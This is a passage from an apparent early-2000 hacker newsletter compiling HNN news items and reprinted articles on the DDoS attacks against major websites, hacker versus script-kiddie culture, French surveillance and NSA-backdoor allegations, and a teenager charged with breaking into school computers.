64.0  HNN:Feb 20th:New Version of DeCSS Available
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Unprivileged user 
      
      Pigdog Journal has published a perfectly legal, harmless, and possibly
      useless program to strip Cascading Style Sheet tags. This new application
      is being named - DeCSS and has nothing at all to do with DVDs. (This
      should be a good sized pain in the ass for DVD-CCA's lawyers.)
      
      Pig Dog Journal
      http://www.pigdog.org/decss/
      
      
      @HWA
      
65.0  HNN:Feb 20th:Y2K Hack Planned for Israel, Local Officials Nervous
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
       
      contributed by Code Kid
      
      Anat Maor, a member of the Meretz party and head of the Knesset's (Israeli
      Parliament) Committee for Scientific and Technological Research and
      Development, was outraged that a hacker convention was taking place in
      Israel. Claiming that 'Hacking' was illegal, she is trying to get the
      conference canceled.  As far as we know the conference is still on
      schedule.
      
      Wired
      http://www.wired.com/news/politics/0,1283,34349,00.html      
      
      HNN Cons Page
      http://www.hackernews.com/cons/cons.html
      
      
      Y2K Hack
      http://www.y2hack.com
      
      
      @HWA
      
66.0  HNN:Feb 21st:French Say Windows is BackDoored By NSA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by William Knowles and Patrick 
      
      A report written by a senior officer of the Strategic Affairs
      Delegation (DAS), a French intelligence agency, has accused the
      National Security Agency (NSA) of working with computer giant Microsoft
      to develop software allowing Washington to spy on communications around
      the world. (The only way Microsoft could be so powerful is with the
      help of the always streamlined and super-efficient US Government.)
      
      The Age
      http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml
      
      Yahoo News
      "http://english.hk.dailynews.yahoo.com/headlines/world/cna/article.html?
      s=hke/headlines/000219/world/cna/US_secret_agents_work_at_Microsoft_cla
      ims_French_intelligence_report_.html"      
      
      Intelligence Online - In French
      http://www.intelligenceonline.fr      
      
      Intelligence Online - English
      http://www.IntelligenceOnline.com
      
      The Age;

      US secret agents work at Microsoft: French intelligence

      Source: AFP | Published: Saturday February 19, 7:44 AM 

      PARIS, Feb 18 - A French intelligence report today accused US secret 
      agents of working with computer giant Microsoft to develop software 
      allowing Washington to spy on communications around the world.

      The report, drawn up by the Strategic Affairs Delegation (DAS), the 
      intelligence arm of the French Defence Ministry, was quoted in today's 
      edition of the news-letter Le Monde du Renseignement (Intelligence World).

      Written by a senior officer at the DAS, the report claims agents from the 
      National Security Agency (NSA) helped install secret programmes on 
      Microsoft software, currently in use in 90 per cent of computers.

      According to the report there was a 'strong suspicion' of a lack of 
      security fed by insistent rumours about the existence of spy programs on 
      Microsoft, and by the presence of NSA personnel in Bill Gates' development 
      teams.

      The NSA protects communications for the US government, and also intercepts 
      electronic messages for the Defence Department and other US intelligence 
      agencies, the newsletter said.

      According to the report, 'it would seem that the creation of Microsoft was 
      largely supported, not least financially, by the NSA, and that IBM was 
      made to accept the (Microsoft) MS-DOS operating system by the same 
      administration.'

      The report claimed the Pentagon was Microsoft's biggest client in the world.
      
     
      
      @HWA
      
67.0  HNN:Feb 21st:France Reported to Have Frenchelon
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      Evidence is surfacing that the French Government has been funding its
      own version of Echelon, a global eavesdropping network, that has
      been dubbed Frenchelon. Listening stations for the French network are
      reported to be in French Guiana, in the city of Domme in the Dordogne
      region of southwestern France, in New Caledonia, and in the United Arab
      Emirates. It is also thought that Germany may be involved to help fund
      the project.
      
      Communications Week International - via cfp.org     
      http://www.cfp99.org/program/papers/cukier.htm      
      
      @HWA
      
68.0  HNN:Feb 21st:DDoS Attacks Mask the Real Threat
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by William Knowles 
      
      While denial of service attacks make the headlines around the world the
      real threat to computer security continues on its merry way
      unobstructed by the commotion. Corporate espionage and disgruntled
      employees are still out there causing trouble, often undetected.
      
      The Register UK
      http://www.theregister.co.uk/000218-000018.html
      
      Posted 18/02/2000 1:59pm by Thomas C. Greene in Washington

      Dot-Com firms are hacking each other -- expert

      All this talk of fifteen-year-old kids vandalising the Web is a smoke 
      screen behind which dangerous, professional crackers are pleased to take 
      cover, security expert Mark Rasch revealed during testimony before a 
      Senate hearing on Internet security earlier this week. 

      The lure of big, fast-money scores in virtual commerce is making it common 
      for skilled hackers to attack competitors in search of free intellectual 
      property, Rasch said before the Senate Appropriations Subcommittee. 

      The present era of "dot-com millionaires and IPO frenzies and the ease of 
      starting your own business" on the Web is creating "a tremendous amount of 
      competition to acquire intellectual property" by any means at hand, Rasch, 
      a vice president with security outfit Global Integrity, explained. 

      "We see sophisticated attacks against computer systems in order to steal 
      intellectual property which can be used in competition with other 
      companies," he added. 

      Info tech companies may be willing to report a nuisance attack such as the 
      recent DDoS campaign, where no company assets are compromised. But Rasch 
      believes that serious, costly, compromising attacks are rarely reported to 
      the authorities. 

      This is because such companies, which own nothing of substance but are 
      valued principally according to the information they possess, depend 
      heavily on consumer confidence. A prosecution and trial, Rasch observes, 
      would make public the security vulnerability that was exploited, hence the 
      company's hopelessly inadequate security measures, he implied. 

      An info tech company will typically lose between ten and one hundred times 
      more money from shaken consumer confidence than the hack attack itself 
      represents if they decide to prosecute the case, he estimated. 

      Further impediments to accurate cyber-crime reporting come from "a 
      fundamental distrust" of law enforcement among the info tech industry. One 
      common fear is that a crucial piece of equipment, like a main server, say, 
      might be impounded for evidence by over-zealous investigators, thereby 
      shutting the company down. 

      It's hardly a surprise, then, that Rasch cited an estimate claiming that 
      fewer than one in ten serious intrusions are ever reported to the 
      authorities. 

      We can safely assume that the few which are reported tend to be those 
      least likely to shake consumer confidence. This explains why the public 
      has been misled into believing that graffiti attacks and other nuisance 
      intrusions by teenagers account for most of the cyber-crime going on. 

      In fact, because it is to a company's advantage to suffer in silence, the 
      real malicious hacking, which would involve the compromising of crucial 
      data and intellectual property by rival tech firms -- and which probably 
      represents the lion's share of online criminal activity -- is kept as a 
      closely-guarded, dirty little secret.  


      
      @HWA 
      
       
      
69.0  HNN:Feb 21st:Earlier Attacks on IRC Servers Could Have Been a Warning
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      Distributed denial of service attacks against various IRC hosts may
      have been a precursor to the actual attacks against the larger targets.
      Administrators at Internet America, a mid sized Dallas ISP, say that
      their IRC servers were hit weeks before Yahoo with a similar attack
      and believe that it was not a coincidence. 
      
      Washington Post
      http://www.washingtonpost.com/wp-dyn/articles/A6148-2000Feb18.html
      
      Hackers' Web Weapons Test-Fired on Chat Sites
  
     
     By Ariana Eunjung Cha, Washington Post Staff Writer
     Saturday, February 19, 2000; Page E01 

     
     Long before the recent attacks on Yahoo and other popular mainstream Web 
     sites caused an international outcry, a similar kind of electronic warfare 
     raged within the online chat communities that are popular hangouts for 
     hackers. 

     The Internet Relay Chat networks--known by names such as DALnet, EFNet and 
     the Undernet--are subnets made up of dozens of servers around the planet. 
     Often compared to citizens' band radio, they host free, real-time 
     conversations about everything from computer graphics cards to gardening. 
     But because the systems allow anonymous log-ins, some areas have become 
     virtual town squares where hackers gather to trade "warez"--pirated 
     software and cracking programs--and to brag about their conquests.

     Their visibility in the hacker community has made them "testing grounds" 
     for new attack strategies like the new "distributed denial of service" 
     method that took down more than a dozen popular World Wide Web sites last 
     week, Internet Relay Chat administrators said. This tactic pummels 
     computers with so much data that legitimate users are effectively locked 
     out.

     "Anything that you see in the wild you are going to see directed at some 
     sort of chat server first," said a security director for Internet America 
     Inc., a mid-size service provider in Dallas that is traded on the Nasdaq 
     Stock Market under the symbol GEEK.

     The Internet America security expert, who did not want to be named because 
     she is participating in a number of investigations, said that in early 
     February, a week before the recent series of high-profile attacks, her 
     company's server was hit with a similar strike so powerful that it shut out 
     many of its paying subscribers for about three hours.

     She said she believes that was "no coincidence."

     Even as FBI agents and independent cybersleuths in the past week have been 
     trolling Internet Relay Chat (IRC) to look for clues about the person who 
     took down Yahoo and other popular sites, the chat networks themselves 
     continue to be hit almost daily with similar attacks.

     "We've been fighting . . . for over three years now," said Danny Mitchell, 
     co-owner of Internet Chat Systems in Plano, Tex., which maintains a machine 
     linked to the Undernet and fends off denial-of-service strikes several 
     times a week. "It's nothing new. At least now it has people's attention 
     since it happened against someone important."

     The IRC networks' anarchist nature--born out of the open philosophy of the 
     original Internet--further makes them an attractive target, said Dave 
     Dittrich, a software engineer at the University of Washington-Seattle who 
     has researched denial-of-service attacks.

     The IRC networks allow users to create private chat rooms, known as 
     channels. The most effective way to break into these conversations is to 
     take down the machine being used by the person who owns the room and hijack 
     the channel.

     In addition, Dittrich and others say IRC has become such an efficient mode 
     of communication that rival hacker groups have taken down servers to 
     prevent them from speaking with each other.

     "It's some kind of power play," said Sven Nielsen, 23, the founder of 
     DALnet. "The hacker will run a denial-of-service attack proving 'I'm bigger 
     than you because I can run this tool against you.' "

     Two days ago, Baltimore-based ABSnet, which is part of the Undernet, one of 
     the oldest and largest gathering places, with more than 50,000 simultaneous 
     users during peak hours, was pummeled with massive numbers of bogus 
     requests for data that sought to muscle out legitimate users. Similar 
     attacks hit its servers on Sunday, Monday and Tuesday--and that was 
     considered a good week.

     The fake data blocked only about half the pipeline through which users 
     exchange information, rather than closing it completely and crashing the 
     network, as it did late one night in January.

     "It used to be very hard to knock us off the map, but now the tools are 
     available to practically anybody" said Howard Leadmon, president of ABSnet 
     Internet Services Inc., which hosts the Undernet's command center. "Joe 
     Blow's kid can now surf the Web and find some hacker site and he's become a 
     one-man warrior."

     Albert Ramnath, a director of Chatnet, an Undernet rival, said his network 
     has fended off similar hits for years. "This morning we had six servers fly 
     apart. This is daily. All it is is 14-year-olds having nothing to do, and 
     we take the heat," he said.

     Just a few years ago, most IRC services were hosted on university 
     computers. Most of the schools bailed when denial-of-service attacks began 
     in earnest and they found hosting the services too much of a headache. Now 
     IRC is maintained largely by private companies, almost all of them Internet 
     service providers with large data pipes like America Online Inc. and AT&T 
     Corp. (They are one of only a few places on the World Wide Web that have 
     resisted commercialization; companies donate their services and very few 
     make any money off the service.)

     With the invention of new, more powerful software late last year that 
     allows malicious hackers to hijack dozens of machines to use against a 
     single server, the attacks have become even more virulent. That has made 
     several hosting companies either pare back their involvement or unhook 
     their servers from a number of IRC networks; several chat services have had 
     to shut down as a result.

     About eight companies have left the Undernet in the past year as a result 
     of the attacks, Leadmon said, and now fewer than 40 are left. He added that 
     several of those businesses lost thousands of dollars in bandwidth and 
     man-hours when their networks were taken down.

     "I'll be the first to admit it that if they attacked 24 hours a day, I 
     would have to pull every Undernet server down. They would put me out of 
     business," said Leadmon, whose company serves both consumer and business 
     Internet users throughout the Washington-Baltimore area. "There is a limit 
     to nice."

     One of the people who have claimed credit for attacking the Undernet in the 
     past uses the name "Coolio" and was once affiliated with the hacker group 
     Global Hell, a group of teens who gained notoriety last year for defacing 
     the White House Web site and breaking into an Army computer. That name 
     resurfaced last week as a potential suspect in the recent spate of attacks 
     against Yahoo and other sites, although people in the computer underground 
     said many people use "Coolio," after the rap star of the same name.

     
     (c) 2000 The Washington Post Company 


      
      @HWA
      
70.0  HNN:Feb 21st:New DDoS Attacks Stories and Angles
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      The FBI is still furiously attempting to dig up information in regards
      to the now two weeks old denial of service attacks against a dozen or
      so major web sites. The media frenzy over this case has reached
      unheard of levels. Some reporters are now taking a step back and
      looking at all the commotion and what it really means, others are just
      looking to report on anything that may be 'hacker' related.
      
      Richard Thieme comments on the difference of 'hackers' and
      'script-kiddies' and how the meaning of the word 'hacker' has warped so
      much in the last few years.

      The Village Voice
      http://www.villagevoice.com/issues/0007/thieme.shtml
      
      
      
      Bronc Buster takes a look at law enforcement and how well they have
      handled or bungled this case, you decide.
      
      The Synthesis
      http://www.thesynthesis.com/tech/keystonecybercops/index.html
      
      
      Old school vs. new school, hacker vs. script-kiddie. Nothing new here
      they just needed a 'hacker' story for the Friday edition.
      
      Washington Post
      http://www.washingtonpost.com/wp-srv/WPlate/2000-02/18/191l-021800-idx.html
      
      
      Village Voice;
      
      HACKING THE FUTURE
      Why Code Crackers Will Lead the Digital Age
      BY RICHARD THIEME


        Let's get our definitions straight. Last week's attacks on dozens of Web 
        sites were not the work of hackers. They were the work of script 
        kiddies, and the difference is everything. Script kiddies download 
        ready-made tools and use them to damage the network. Script kiddies 
        criminally distort the essential ethos of hacking, which is to pass 
        through the network without a trace. Hackers read the unknown, sense the 
        contours of the codes that make all tomorrow's parties and stock market 
        booms. 

      It's no wonder that last week hackers everywhere cringed when the media 
      confused them with script kiddies. Not less than 10 years ago, the word 
      hacker conjured a dedicated geek, hunched over a glowing terminal, working 
      late into the night to solve an intractable dilemma. Now hacker means 
      something akin to cybercriminal. The semantic shift is regrettable, not 
      only because the distortion inhibits clarity, but because it buries a 
      piece of history we'd be wise to keep fresh: It was hackers who cobbled 
      together the Internet. 

      Let's define our terms again. Hacking is a quest for knowledge. You can 
      see the essence of the activity in meetings at security firms like Secure 
      Computing, where hackers are a key part of the professional services team. 
      With clients in the Fortune 500 and three-letter government agencies, like 
      the CIA and FBI, the stakes are high, and when the firm faces a perplexing 
      problem, brainstorming sessions go late into the night. Ideas fly from one 
      person to another like pinballs off flippers, as the group mind turns over 
      and examines the puzzle from all sides. 

      Group mind. There's a concept that flows from the structure of the 
      Internet itself, parallel processor harnessed to parallel processor to 
      achieve a single goal. It's no coincidence that information technology 
      professionals often think in a style similar to the way computers 
      calculate. The network taught them how to reason digitally; it imprinted 
      itself on their minds just as they imprinted their minds on it. 

      Is it any wonder, then, that hackers are the leaders of the new 
      millennium? Again, a question of terminology. By leader I mean someone who 
      forges ahead and names the dim future. Consider Tim Berners-Lee, who 
      designed the first Web protocols and wrote the first browser code. 
      Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of 
      Open Source software. Stallman is an extraordinary hacker. I could go on 
      and on. I recently consulted with a major mutual fund, and after the 
      meeting I traded war stories with its head of IT. He fondly recalled the 
      old days of hacking Unix systems. That this former "delinquent" now runs a 
      system executing billion-dollar transactions is not shocking. Most of the 
      bright people in the IT business learned how to hack by--what 
      else?--hacking. 

      Let's go back to Open Source for a moment. It's now the conventional 
      wisdom that the Linux operating system and GNU Project are miracles of 
      modern computing, which may one day triumph over the clunky software 
      produced by the Microsoft-Apple cartel. Stallman launched the GNU Project 
      by asking hackers to volunteer their services. Of course, they did. 
      Likewise, Linux was founded on the belief that complex systems must be 
      open, evolving, and free in order to reach their full potential. In other 
      words, they must be hackable and they must be hacked. Continuously. 

      Now comes the FBI and President Clinton with criminal sanctions for these 
      script kiddies. It's right and just to keep the peace, but let's remember 
      that in the Internet's embryonic stage, hacking, far from being criminal, 
      was encouraged. When computers were first networked through telephone 
      lines and slow modems, bulletin boards emerged as crossroads where 
      cybertravelers could leave messages and valuable information about how the 
      phone lines intersected with microprocessors. By these postings, the 
      network formed a symbiotic relationship with its users, and through the 
      give and take of countless exchanges between hackers, the network 
      bootstrapped itself to a higher level of complexity. As Tom Jackiewicz, 
      who helps administer upt.org, an outgrowth of the hackers' favorite, the 
      UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid 
      could afford a Solaris workstation. The only machines available were 
      online. You could learn only by roaming the network." 

      Today the stakes are higher, security tighter, but the basic modalities of 
      hacking and its relationship to innovation remain. The challenge du jour 
      is the gauntlet thrown down by Microsoft, which claims that Windows NT, 
      the operating system of many businesses, is secure. What a claim! For a 
      baseball fan it would be like hearing the Yankees brag that they could 
      play an entire season without losing a single game. Hackers love to find 
      flaws in Windows NT. For them, the payoff is the power rush of the thunk! 
      when the stone hits Goliath in the forehead. 

      One of the sharpest stones to leave a hacker's sling is a program called 
      Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the 
      program can be loaded stealthily on a Windows network, giving a remote 
      user control over the network. Why develop such a weapon? In the current 
      environment of ubiquitous distributed computing--that is, networks and 
      nodes everywhere--the hackers argue that no operating system protects 
      against stealthy executables like Back Orifice. So the program is a form 
      of shock therapy. It jerks Microsoft into action, stirring an indolent 
      industry into making the Internet more secure. The upgrades that come as a 
      result benefit every Windows user. 

      As a culture we are just beginning to recognize this dynamic. One of the 
      first hacker groups to benefit from our grudging acceptance of the craft 
      is L0pht, which crossed over from the computing underground to the 
      mainstream after finding flaws in Windows NT. Their transition has been so 
      successful that when Congress conducted an investigation into Internet 
      security it asked two L0pht members, Mudge and Weld Pond, to come to 
      Washington for a briefing. Now L0pht has teamed up with former Compaq 
      Computer executives to form @Stake, a security firm that has the media and 
      Wall Street swooning. 

      So when is a hacker not a felon? When he receives $10 million in venture 
      capital? When Congress invites him to a hearing? 

      When we lump all hackers into a criminal class we are liable to forget 
      their essential role as architects of the information age. Edward O. 
      Wilson said that scientists are characterized by a passion for knowledge, 
      obsession, and daring. Hackers share that passion, the hunter-gatherer 
      gene for restless wandering, wondering what's beyond the next hill. They 
      hack because it's fun, because it's a challenge, and because the activity 
      shapes their identity. Their strengths--love of risk, toleration of ambiguity,
      and ability to sift meaning from disparate sources--power the very network 
      we all rush to join. 

      
     
     -=-
      
     Bronc Buster;The Synthesis
     
     
     Attacks on the internet's most popular sites have prompted a witch hunt
     carried out by the FBI and embittered corporations...
     
     By Bronc Buster
     
     
     Over the last few days, reports have surfaced in the media regarding two 
     names, Mafiaboy and Coolio, reportedly connected with last week's large-scale 
     denial-of-service attacks that managed to temporarily cripple some of the 
     Internet's most visited sites. The FBI is scrambling to track down these two 
     people, asking for court warrants and calling on informers for help in the 
     chase. 

      So what does the FBI have on these two people, Web users whose names are 
      being talked about in the media as though they were two of America's most 
      wanted cyber-criminals?

      Recourse Technologies, a so-called Internet Security firm that tracks down 
      hackers, was the first to point a finger at a mysterious person who goes 
      by the name Mafiaboy. According to our investigations, as well as 
      other reports starting to surface, the evidence this group has gathered 
      that supposedly fingers this person is almost laughable. It appears that, 
      last week, an employee from Recourse Technologies got on Inter-Relay Chat 
      and started to visit chat channels frequented by hackers and crackers 
      alike. From here, questions were asked regarding the attacks and someone 
      with the nickname "anon" claimed he was responsible. Later in the chat, he 
      admitted that his real nickname was "Mafiaboy," and not "anon" as he has 
      previously stated. A Wired.Com investigation turned up someone by the name 
      Mafiaboy who had an account at a Canadian Internet Provider, but was 
      removed in early 1998. Also quoted were Canadian authorities, who said 
      that they work closely with the FBI and were working with them on this 
      case, but to date had no knowledge of anyone named "Mafiaboy" in 
      connection to any case on which they were working.

      After getting on Inter-Relay Chat late Tuesday night, I myself was able to 
      find over half a dozen people going by the nickname Mafiaboy, and almost 
      all of them were playing up to the media hype; several of them were 
      from Canada. Once I started asking questions, I got over 20 people on just 
      one network 'fessing up to being the person who did the attacks.

      What kind of hard evidence is this, and why is a technology-ignorant media 
      following it like a donkey with a carrot hung out over its head? 

      Coolio, the latest person to be fingered in these attacks by a report from 
      RSA (a company owned by Network Associates) and Stanford University, is 
      also somewhat of a mystery. According to the report, Coolio had 
      claimed responsibility for the defacement of the RSA Web site last week, 
      which reports say mentioned one of the investigators working on the 
      denial-of-service attacks case. In addition to this, the report mentions 
      that Coolio had gained unauthorized access to a system in Russia, and had 
      other proofs that reportedly connect him with these attacks. Also 
      according to the RSA report, Coolio is said to be living in the Midwest, 
      and they had found his location down to the street address, which was 
      turned over to the FBI.

      When we here at The Synthesis followed up on the RSA report, it took us no 
      more than a few hours to track down Coolio. (I must admit that I know him, 
      and have had dealings with him in the past). Coolio may have 
      originally been from Champaign, Illinois, but now, according to friends 
      who asked to remain anonymous and a simple trace of his Internet Provider, 
      he now resides in the San Diego area of California. Although Coolio 
      refused comment on any questions I raised to him regarding this case and 
      his guilt or innocence, his friends said he had not committed these 
      crimes. They also added that he was deeply concerned that he was being set 
      up, and scared of a possible FBI raid on his residence in the near future.

      Although The Synthesis hasn't heard all the evidence against Coolio and 
      does not have access to the complete contents of the RSA report sent to 
      the FBI, doubts are starting to rise concerning Coolio's       
      responsibility in these actions. From talking to some of Coolio's friends 
      and long term associates, the general conscience is, not only did he not 
      have the resources to do these attacks, but lacks the level of skill being 
      described by some of the companies who were attacked. It could also be 
      that RSA, whose stock tumbled after their site was hacked by Coolio, have 
      other motives in fingering this hacker in the largest denial-of-service 
      attack in the history of the Internet.

      With so much media attention being focused on this case, it's almost a mad 
      rush to find someone on whom to put the blame. It stands to reason that 
      whoever catches the person or people responsible will take all the 
      glory and bask in the media spotlight, not only helping their career, but 
      the company who they work for in this time of the "online security arms 
      race."

      Who will be next to step forward and offer someone else to the FBI? I 
      wouldn't be surprised if it was the Psychic Hotline. I also wouldn't be 
      surprised if the people who were responsible for these attacks were never       
      found.

      Bronc Buster is a California-based hacker who can be reached at 
      bronc@thesynthesis.com
      
      
      -=-
      
      Washington Post;
      
      The Code of the Hacker
      Those Who Broke In When The Web First Was Spun Say
      'Script Kiddies' Are Ruining Their Image

      By Libby Copeland
      Washington Post Staff Writer
      Friday, February 18, 2000; Page C01 

      Sometimes when he's playing pool, the answers come.

      He gets a Bass Ale and a cue. He and his roommate play this complicated
      version--instead of predicting the next shot, each has to predict the next
      three shots--and as the white ball spins and Jeff Fay racks up points, he
      gets these epiphanies.

      Like, how to crack a certain e-commerce site. Say a hacker intercepted a
      customer making purchases at an Internet commerce site, and he wants to
      figure out the password that would let him sneak into the system and
      access the company's financial information. He's got a computer hooked
      up to run all the possible passwords in hopes of finding the one, but the
      process takes so darn long, the customer will probably log off before the
      hacker cracks the code.

      Here's where Jeff Fay's revelation comes in. What if the interloper could
      inject a packet of information that would temporarily pause the connection
      between the customer and the company? Through a series of these pauses,
      the hacker could slow the customer's transaction--possibly buying himself
      enough time to crack the code.

      Voila. 

      "I think it's fairly elegant," Fay says, the dimple on his right cheek twinkling
      as he stands by his gray office cubicle in Reston. He's flush with pride,
      even though he'll never carry out this scheme. It's just the way his mind
      works: He loves a puzzle; he loves math. He takes pleasure in having a
      fast, tensile mind. He finds a nice piece of code aesthetically satisfying.

      All of which makes the denial-of-service attacks that hit Yahoo, CNN,
      E-trade and other sites last week particularly abhorrent to him.

      "A bunch of script kiddies flexing their muscles," Fay says, his disdain
      evident. There's little commonality between true hackers and "the
      14-year-old who can't spell Windows NT."

      Fay considers himself a true hacker. His work, he says, derives from
      technical expertise and creative inspiration. He and others, who came of
      age in the early- and mid-'90s, when the Internet was still nascent, see a
      gulf between themselves and younger Net newbies, who don't seem to
      respect the technology.

      Those "script kiddies." You know the stereotype: the lonely,
      acne-encrusted teen with little technical skill but plenty of vengeance who
      uses tools written by others to muscle into Web sites. Fay and others scoff
      when folks call these kids "hackers." The culprits in last week's Web
      attacks may or may not fit this description. The motive could have been
      political, rather than adolescent thrill-seeking, and experts quibble over the
      culprits' technical expertise. But many hackers say a great amount of
      Internet vandalism is juvenile stuff, the equivalent of picking a sprung lock.

      The beauty of hacking is lost on these low-level intruders, Fay says. Fay
      himself earned his street credibility by dabbling in underground ("black
      hat") hacking in college, and now, as a "white-hat" hacker, he earns money
      defending the security of Web sites and software.

      His complaints sound like the familiar tale of one generation denigrating the
      next, except he is only 24--not much older than the kids he scoffs at. But
      generational differences can develop in just a few years in the collapsed
      chronology of the cyberworld. This is about the old--no, older--hackers
      vs. the new.

      Hacking is not a phenomenon of the Internet age. In his 1984 book,
      "Hackers: Heroes of the Computer Revolution," Steven Levy writes of the
      original computer hackers, MIT University students who in the late '50s
      and early '60s secretly infiltrated an IBM mainframe to learn its inner
      workings. Their definition of the hack--"imbued with innovation, style, and
      technical virtuosity," as Levy writes--formed the intellectual soil upon which
      Internet age hacking would grow.

      A fine mind and a criminal intention are not mutually exclusive. Some good
      hackers have also been good thieves. In 1994 a Russian hacker
      transferred millions of dollars out of Citibank into various accounts. Last
      year a hacker (also Russian) stole credit card numbers off a music retailer's
      site and tried to ransom them.

      There have also been plenty of politically motivated attacks, not the least of
      which may have been last week's. Bruce Sterling, one of the early
      chroniclers of hacker culture, says the Yahoo bombardment takes a page
      from '60s dissidents like Abbie Hoffman, who once dropped money onto
      the floor of the New York Stock Exchange. The brokers dove for the
      money. It proved, to Hoffman, their crass materialism.

      Nevertheless, Sterling adds, in terms of technical expertise, last week's
      attacks were "as dumb as a bag of hammers."

      "Most of the attacks tend to be not really highly sophisticated," says Elias
      Levy, chief technology officer with SecurityFocus.com, a West Coast
      company. As for motivation, Levy says, "most of the attacks tend to be for
      pure acceptance within the hacker community. Sadly, a lot of the time the
      political message is only an afterthought."

      It's not surprising that the hacking culture is changing. In the early '90s,
      those who had access to the developing Internet were often university
      students with connections to computer science. Nowadays, the pool of
      Internet users is far greater, and, as Sterling points out, unfettered access
      to the Internet is the province of middle- and upper-class teenagers.

      Once, says Jeff Moss, who runs the West Coast hacker conventions
      DefCon and Blackhat, hackers were a community. There was a
      give-and-take. There were relationships. "Nobody would share
      information with you if you didn't share information back," he says. "Now
      the problem is, knowledge isn't being traded as little tidbits. It's available
      for free, and so there's no natural screening process. And there's no
      socialization."

      Imagine. Hackers--who usually seem to operate outside the
      law--preaching socialization and all its implications: responsibility, ethics.

      This is a familiar plot: The aristocracy crumbles when the gates open and
      commoners rush in. In the words of Jim Thomas, a professor at Northern
      Illinois University who also runs an online journal of the computer
      underground, you "have a diversity of people, and unfortunately they begin
      to reflect the general population much more. You get your bozos."

      There's no denying that hackerdom has long offered a mystique, and
      mystique is the equivalent of catnip for teenagers. To be righteous,
      misunderstood and powerful--that amounts to glory in the adolescent
      world.

      So, to amend a phrase from the ever-popular show, "Who Wants to Be a
      Hacker"?

      Check the search engines. The Web is rife with Net newbies begging,
      "Teach me how to hack." Among the letters to the editor in the latest issue
      of the online hacker magazine Phrack, they plead:

      "Hi, I am a wannabe hacker . . . Where will i find material describing
      typical methods to test the systems for security[?]" Or, "i'm a future hacker
      to be for now i need info about a free server." Or, "I found my schools
      dial-up and I want you guys to try and hack it if you can . . . [Mess] it up
      as much as possible please!"

      When they do acquire tools, they often deface Web sites, leaving
      messages complete with misspellings, expletives and shout-outs that are
      reminiscent of early '80s graffiti wars.

      The paradox is that true hackers have provided the entry into this
      vandalism. "Gray hat" hackers, like the legendary group L0pht, which has
      now joined with the security firm @Stake in Cambridge, Mass., have
      frequently posted scripts that others used to break into Web sites. Jeff Fay
      himself has poked around for software bugs and posted them publicly--a
      common practice among hackers.

      Critics say this is like breaking into someone's house and leaving the door
      open, while robbers mill about on the street outside. But like most true
      hackers, Fay abides by the dictum "information wants to be free."
      Hackers, he says, do everyone a favor by pointing out soft spots and
      putting pressure on otherwise lax security administrators or software
      creators to fix things.

      "The people who are developing attacks and posting them, I don't consider
      them evil," he says. "They're really doing quality control," he says.

      In any case, many hackers say all of this is peripheral to their original
      intention. In the beginning, says Brian Martin, who is an editor with the
      hacker site attrition.org, "the whole goal [of hacking] was not to be
      discovered. . . . To go in, figure out how a system worked, and leave, just
      as quietly." The purpose was understanding.

      Fay understands these ambiguities. He's working for Infrastructural
      Defense, a company that provides Internet security. He and many of his
      hacker friends are now paid to hunt for vulnerabilities on behalf of their
      clients, and to fix them. On a shelf in his cubicle, he keeps "Cryptography"
      and "Applied Cryptography." 

      But he knows his roots originate in a smaller, more elite--and perhaps
      disappearing--society of hackers. Atop his wispy blond hair he wears a
      black cap that reads "2600," the name of a well-respected online hacker
      magazine. He also wears a hacker T-shirt that sarcastically reads, "I
      {heart} Feds." 

      Until, that is, he finds out that someone wants to interview him, and he
      dashes home to Kingstown to change into a plain white turtleneck. As if to
      reinforce the legitimacy of his art. 

       Copyright 2000 The Washington Post Company
      
      @HWA
      
71.0  HNN:Feb 21st:Student Charged with Breaking Into High School Systems
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Dan 
      
      Jacy Kyle Johnson, 14, has been charged with accessing a computer
      network without authorization of the network owner after he allegedly
      broke into teacher grading files from a computer in the school library.
      Crystal River High School officials say they don't think he changed
      his or anyone else's grade, but he may have penetrated at least two
      firewalls to reach the compromised system.
      
      St.Petersburg Times
      http://www.stpetersburgtimes.com/News/021800/Citrus/Boy__14__charged_with.shtml
      
      Boy, 14, charged with hacking

           Authorities say he got into a server at
           Crystal River High School that contained
           teacher files, including students' grades.
           But they say he didn't change anything or
           damage the school's system. 
   
      By BILL VARIAN
   
       St. Petersburg Times, published February 18, 2000 
   
   
      CRYSTAL RIVER -- Jacy Kyle Johnson sometimes
      bragged to his friends that he could crack the school
      computer system and change his grades. 
   
      He is accused of doing a little more than boast. 
   
      Johnson, 14, is charged with hacking his way into teacher
      grading files almost two weeks ago from a computer in the
      Crystal River High School library. School officials say they
      don't think he changed his or anyone else's grade, but he may
      have penetrated at least two protective software layers in the
      computer called firewalls, which are designed to prevent
      such intrusions. 
   
      "The first thing we did is call in our district technical support
      people," Crystal River principal Craig Marlett said Thursday.
      "They're pretty confident he didn't change his grades. He was
      on his way, but didn't get quite into it." 
   
      Johnson was in juvenile court Thursday, where he faced a
      charge of accessing a computer network without
      authorization of the network owner -- computer hacking --
      stemming from his Feb. 7 arrest. He also faced three other
